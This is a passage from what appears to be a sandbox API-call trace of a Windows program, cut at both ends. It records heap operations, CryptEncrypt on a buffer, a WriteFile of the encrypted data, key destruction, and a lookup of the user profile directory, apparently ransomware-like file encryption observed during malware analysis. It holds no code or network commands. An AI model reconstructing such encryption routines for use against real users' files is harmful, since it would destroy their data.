lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0208.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0208.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab338, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.938] CryptEncrypt (in: hKey=0x9e1ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xe0a8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xe0b0) returned 1 [0208.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.938] CharLowerBuffW (in: lpsz="byte[57520]", cchLength=0xb | out: lpsz="byte[57520]") returned 0xb [0208.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.939] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.939] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.939] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.939] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.939] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.939] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab1d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.940] CryptEncrypt (in: hKey=0x9e1ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xe0a8, dwBufLen=0xe0b0 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xe0b0) returned 1 [0208.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.942] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.942] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.942] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.942] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.942] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.942] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.942] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.942] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.942] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.942] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.942] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.942] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.943] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.943] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.943] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.943] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.943] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.943] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.943] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.943] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.984] WriteFile (in: hFile=0x510, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0xe0b0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0xe0b0, lpOverlapped=0x0) returned 1 [0208.986] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.986] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.986] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0208.986] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.986] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0208.986] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.986] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.986] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.987] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.987] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.987] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.987] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.987] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab020, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0208.987] CryptDestroyKey (hKey=0x9e1ab8) returned 1 [0208.987] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.987] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.987] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.987] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.987] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.987] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.987] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.987] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.987] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.987] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.987] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.987] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.987] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.987] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.988] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.988] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.988] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.988] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.988] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.988] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.988] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.988] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.988] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.988] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.988] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.988] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.988] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.988] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.988] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.988] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.988] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.988] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.988] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.988] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.988] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.988] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.989] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.989] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.989] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.989] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.989] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.989] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.989] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.989] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.989] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.989] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.989] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.989] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.989] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.989] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.989] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.989] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.989] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7040, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0208.989] CryptReleaseContext (hProv=0xa7bc48, dwFlags=0x0) returned 1 [0208.989] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.989] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.990] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.990] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.990] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.990] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.990] FreeLibrary (hLibModule=0x76390000) returned 1 [0208.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.990] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.990] CloseHandle (hObject=0x524) returned 1 [0208.992] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.992] CloseHandle (hObject=0x510) returned 1 [0208.994] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.997] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.997] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.997] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0208.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0208.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0208.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0208.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0208.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0208.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0208.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0208.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0208.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.998] HeapFree (in: hHeap=0x2af0000, 